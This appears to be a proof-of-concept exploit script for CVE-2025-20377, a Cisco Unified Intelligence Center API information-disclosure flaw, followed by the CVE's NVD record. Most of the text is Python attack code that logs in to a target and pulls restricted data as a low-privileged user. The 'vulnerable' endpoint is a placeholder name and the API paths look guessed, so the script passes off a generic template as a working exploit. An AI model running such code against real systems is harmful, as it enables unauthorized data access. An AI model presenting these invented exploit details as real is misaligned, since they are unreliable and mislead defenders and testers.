CVE-2025-20377

# CVE-2025-20377 PoC - Cisco Unified Intelligence Center API Information Disclosure # This PoC demonstrates the information disclosure vulnerability # Note: This is for educational purposes only import requests import sys def exploit_cve_2025_20377(target_url, username, password): """ Exploit for CVE-2025-20377 Cisco Unified Intelligence Center API Information Disclosure """ # Login to obtain session token login_url = f"{target_url}/uic-api/v1/auth/login" login_data = { "username": username, "password": password } try: # Attempt login session = requests.Session() login_response = session.post(login_url, json=login_data, verify=False, timeout=10) if login_response.status_code == 200: print("[+] Login successful") token = login_response.json().get('token') # Access vulnerable API endpoint # The vulnerable endpoint allows low-privileged users to access restricted data api_url = f"{target_url}/uic-api/v1/api-endpoint-that-should-require-higher-privileges" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Request sensitive information response = session.get(api_url, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Successfully accessed restricted API endpoint") print("[+] Retrieved sensitive information:") print(response.text) return response.json() else: print(f"[-] Failed to access API: {response.status_code}") return None else: print("[-] Login failed") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} https://target.com admin password123") sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] exploit_cve_2025_20377(target_url, username, password)

{"cve": {"id": "CVE-2025-20377", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:39.200", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the API subsystem of Cisco Unified Intelligence Center could allow an authenticated, remote attacker to obtain sensitive information from an affected system.\r\n\r\nThis vulnerability is due to improper validation of requests to certain API endpoints. An attacker could exploit this vulnerability by sending a valid request to a specific API endpoint within the affected system. A successful exploit could allow a low-privileged user to view sensitive information on the affected system that should be restricted. To exploit this vulnerability, the attacker must have valid user credentials on the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-mult-vuln-gK4TFXSn", "source": "[email protected]"}]}}